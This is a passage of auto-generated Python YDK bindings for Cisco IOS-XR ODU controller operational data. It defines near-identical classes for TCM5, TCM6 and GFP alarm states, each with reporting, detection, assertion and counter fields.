**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm5Oci, self).__init__()
self.yang_name = "tcm5-oci"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm5-oci"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Oci, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Oci']['meta_info']
class Tcm5Lck(_Entity_):
"""
TCM5 Upstream Connection Locked
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm5Lck, self).__init__()
self.yang_name = "tcm5-lck"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm5-lck"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Lck, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Lck']['meta_info']
class Tcm5Iae(_Entity_):
"""
TCM5 Incoming Alignment Error
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm5Iae, self).__init__()
self.yang_name = "tcm5-iae"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm5-iae"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Iae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Iae']['meta_info']
class Tcm5Biae(_Entity_):
"""
TCM5 Backward Incoming Alignment Error
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm5Biae, self).__init__()
self.yang_name = "tcm5-biae"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm5-biae"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Biae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Biae']['meta_info']
class Tcm5Bdi(_Entity_):
"""
TCM5 Backward Defect Monitoring
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm5Bdi, self).__init__()
self.yang_name = "tcm5-bdi"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm5-bdi"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Bdi, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Bdi']['meta_info']
class Tcm5Tim(_Entity_):
"""
TCM5 Trail Trace Identifier Mismatch
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm5Tim, self).__init__()
self.yang_name = "tcm5-tim"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm5-tim"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Tim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Tim']['meta_info']
class Tcm5SfBer(_Entity_):
"""
TCM5 SF BER alarm
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm5SfBer, self).__init__()
self.yang_name = "tcm5-sf-ber"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm5-sf-ber"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5SfBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5SfBer']['meta_info']
class Tcm5SdBer(_Entity_):
"""
TCM5 SD BER alarm
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm5SdBer, self).__init__()
self.yang_name = "tcm5-sd-ber"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm5-sd-ber"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5SdBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5SdBer']['meta_info']
class Tcm6Ais(_Entity_):
"""
TCM6 Alarm Indication Signal
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm6Ais, self).__init__()
self.yang_name = "tcm6-ais"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm6-ais"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Ais, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Ais']['meta_info']
class Tcm6Ltc(_Entity_):
"""
TCM6 Loss of Tandem connection Monitoring
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm6Ltc, self).__init__()
self.yang_name = "tcm6-ltc"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm6-ltc"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Ltc, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Ltc']['meta_info']
class Tcm6Oci(_Entity_):
"""
TCM6 Open Connection Indiction
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm6Oci, self).__init__()
self.yang_name = "tcm6-oci"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm6-oci"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Oci, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Oci']['meta_info']
class Tcm6Lck(_Entity_):
"""
TCM6 Upstream Connection Locked
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm6Lck, self).__init__()
self.yang_name = "tcm6-lck"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm6-lck"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Lck, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Lck']['meta_info']
class Tcm6Iae(_Entity_):
"""
TCM6 Incoming Alignment Error
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm6Iae, self).__init__()
self.yang_name = "tcm6-iae"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm6-iae"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Iae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Iae']['meta_info']
class Tcm6Biae(_Entity_):
"""
TCM6 Backward Incoming Alignment Error
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm6Biae, self).__init__()
self.yang_name = "tcm6-biae"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm6-biae"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Biae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Biae']['meta_info']
class Tcm6Bdi(_Entity_):
"""
TCM6 Backward Defect Monitoring
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm6Bdi, self).__init__()
self.yang_name = "tcm6-bdi"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm6-bdi"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Bdi, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Bdi']['meta_info']
class Tcm6Tim(_Entity_):
"""
TCM6 Trail Trace Identifier Mismatch
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm6Tim, self).__init__()
self.yang_name = "tcm6-tim"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm6-tim"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Tim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Tim']['meta_info']
class Tcm6SfBer(_Entity_):
"""
TCM6 SF BER alarm
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm6SfBer, self).__init__()
self.yang_name = "tcm6-sf-ber"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm6-sf-ber"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6SfBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6SfBer']['meta_info']
class Tcm6SdBer(_Entity_):
"""
TCM6 SD BER alarm
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm6SdBer, self).__init__()
self.yang_name = "tcm6-sd-ber"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm6-sd-ber"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6SdBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6SdBer']['meta_info']
class GfpLfd(_Entity_):
"""
Loss Of Frame Delineation
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.GfpLfd, self).__init__()
self.yang_name = "gfp-lfd"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
